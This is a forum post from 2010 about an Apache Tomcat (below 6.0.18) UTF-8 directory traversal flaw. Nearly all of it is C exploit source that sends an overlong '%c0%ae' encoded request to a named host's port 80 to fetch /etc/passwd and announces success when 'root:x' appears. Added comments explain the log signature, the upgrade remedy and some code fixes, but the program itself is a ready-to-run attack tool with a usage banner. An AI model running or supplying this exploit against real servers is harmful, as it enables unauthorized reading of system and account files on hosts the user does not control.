[推荐]Apache Tomcat <6.0.18 UTF8的目录遍历漏洞
发表于: 2010-7-28 23:46 4951

/* Not very reliable, but worth trying if the target's directory structure has /usr/local/wwwroot

   

*/ 

#include <stdio.h>  

#include <unistd.h>  

#include <stdlib.h>  

#include <string.h>  

#include <errno.h>  

#include <string.h>  

#include <netinet/in.h>  

#include <netdb.h>  

#include <sys/types.h>  

#include <sys/socket.h>  

#include <arpa/inet.h>  

/* Fixed HTTP/1.0 request sent to the server under test. "%c0%ae" is the
 * overlong two-byte UTF-8 encoding of '.', so every "%c0%ae%c0%ae" path
 * segment becomes ".." on a server that decodes overlong forms, which lets
 * the path climb three directories above the web root. The same byte pattern
 * in an access log is the signature to search for when checking whether a
 * server has been probed this way. */
#define EXPLOIT "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0\n\n"  

/* Size in bytes of the buffer that holds the server's reply. */
#define RCVBUFSIZE 9999    

/* Marker searched for in the reply with strstr(); finding it is taken to mean
 * that the body of /etc/passwd was returned. */
#define tester "root:x"       

/* Clear the terminal and move the cursor to row 1, column 1 by writing the
 * two ANSI escape sequences ESC[2J and ESC[1;1H to stdout. */
void cls()
{
    static const char *const sequences[] = { "[2J", "[1;1H" };
    const char escape = 27;
    size_t idx;

    for (idx = 0; idx < sizeof sequences / sizeof sequences[0]; idx++) {
        printf("%c%s", escape, sequences[idx]);
    }
}

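/*
 * Send the fixed EXPLOIT request to port 80 of the host named in argv[1] and
 * report whether the reply contains the `tester` marker.
 *
 * Reading the result:
 *  - A positive verdict means the server decoded the overlong "%c0%ae"
 *    sequences as '.' and served a file from outside its web root. The page
 *    title lists Tomcat versions below 6.0.18 as affected, so the remedy for
 *    a positive result is to move to a release at or above that version.
 *  - A negative verdict is not proof of a patched server: the request climbs
 *    a fixed three directory levels, so it only matches some install layouts.
 *
 * Changes against the original listing, all in the tool's own safety:
 *  - the reply is printed with fputs() instead of being passed to printf() as
 *    the format string, because the reply is attacker-controllable data;
 *  - send() transmits exactly the request bytes; the original length of 999
 *    read far past the end of the string literal and put unrelated process
 *    memory on the wire;
 *  - the reply is accumulated in the buffer instead of each recv() overwriting
 *    the previous chunk, and the buffer is always NUL-terminated before use;
 *  - the buffer is no longer searched when connect() or send() failed, where
 *    it was uninitialised;
 *  - the strstr() result is no longer stored in an int.
 *
 * Every path returns status 1. The original already did so for both verdicts;
 * only the connect-failure path used to fall off the end of main with 0.
 */
int main(int argc,char **argv)
{
    if (argc < 2) {
        /* No host given: show the banner and usage text, then stop. */
        cls();
        printf("\nApache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit\n");
        printf("\nc0d3r: mywisdom\n");
        printf("\nusage:./tomcatevil hotname\n");
        exit(1);
    }

    const int port = 80;
    char echobuf[RCVBUFSIZE];
    struct sockaddr_in their_addr;
    int sockfd;

    struct hostent *he = gethostbyname(argv[1]);
    if (he == NULL) {
        /* gethostbyname() reports failure through h_errno, not errno, so
         * perror() would append an unrelated system message here. */
        fputs("\nSorry please recheck your target hostname !\n", stderr);
        exit(1);
    }
    if (he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof their_addr.sin_addr) {
        /* Only an IPv4 address fits the sockaddr_in filled in below. */
        fputs("\nresolved address is not IPv4\n", stderr);
        exit(1);
    }

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(1);
    }

    /* Zero the whole structure, then copy the address bytes instead of
     * dereferencing a cast pointer into the resolver's buffer. */
    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(port);
    memcpy(&their_addr.sin_addr, he->h_addr_list[0], sizeof their_addr.sin_addr);

    printf("\n[-]Checking whether port %d opens or not\n", port);
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
        perror("failed to connect !!!");
        close(sockfd);
        return 1;
    }

    printf("\n[+]Port %d opens !!! now sending your exploit to our target\n", port);

    /* sizeof on the literal counts the terminating NUL, which is not sent. */
    const size_t request_len = sizeof(EXPLOIT) - 1;
    ssize_t sent = send(sockfd, EXPLOIT, request_len, 0);
    if (sent == -1) {
        perror("send");
        close(sockfd);
        return 1;
    }
    if ((size_t)sent != request_len) {
        fputs("send: request was only partly written\n", stderr);
        close(sockfd);
        return 1;
    }

    /* Collect the reply until the peer closes, an error occurs, or the buffer
     * is full; one byte stays reserved for the terminator. */
    size_t total = 0;
    while (total < sizeof echobuf - 1) {
        ssize_t got = recv(sockfd, echobuf + total, sizeof echobuf - 1 - total, 0);
        if (got <= 0) {
            break;
        }
        total += (size_t)got;
    }
    echobuf[total] = '\0';
    close(sockfd);

    /* The reply is untrusted: write it as data, never as a format string.
     * NOTE(review): it is still written raw, so any terminal control bytes
     * the server sends reach the terminal unfiltered. */
    fputs(echobuf, stdout);

    const char *hit = strstr(echobuf, tester);
    if (hit != NULL) {
        printf("\n[+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!!\n");
    } else {
        printf("\n[-]target not vulnerable !!!\n");
    }
    return 1;
}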
